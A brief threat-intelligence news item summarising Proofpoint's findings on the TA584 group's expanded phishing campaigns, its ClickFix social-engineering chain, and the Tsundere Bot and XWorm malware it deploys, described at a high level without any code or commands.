60/69 Friday, January 30, 2026
Researchers at Proofpoint have observed increased activity from TA584, an Initial Access Broker (IAB) group that significantly expanded its operations in late 2025. The group reportedly tripled its campaign volume, broadening its targeting beyond North America and the United Kingdom to include Germany, other European countries, and Australia. TA584 has been using Tsundere Bot in combination with XWorm to compromise systems, with infections believed to potentially lead to follow-on ransomware attacks.
The attack chain begins with phishing emails sent through legitimate services such as SendGrid or Amazon SES. After victims click the embedded link and pass IP checks or geofencing, they are redirected to a CAPTCHA page, followed by a “ClickFix” social-engineering page that displays fake error messages. Victims are tricked into copying and executing PowerShell commands themselves. These commands download and execute scripts that install Tsundere Bot or XWorm directly in memory. TA584 has previously deployed a range of payloads, including Ursnif, Cobalt Strike, and WarmCookie.
Tsundere Bot is a Malware-as-a-Service (MaaS) offering that functions as both a backdoor and a loader, leveraging Node.js for execution. It can collect detailed system information for host profiling and turn infected machines into SOCKS proxies. The malware also retrieves its command-and-control (C2) addresses from the Ethereum blockchain using an EtherHiding technique to evade detection. Additionally, it includes language-based execution checks to terminate if it detects systems in CIS countries, and it features an internal “bot marketplace”-style infrastructure within its platform.
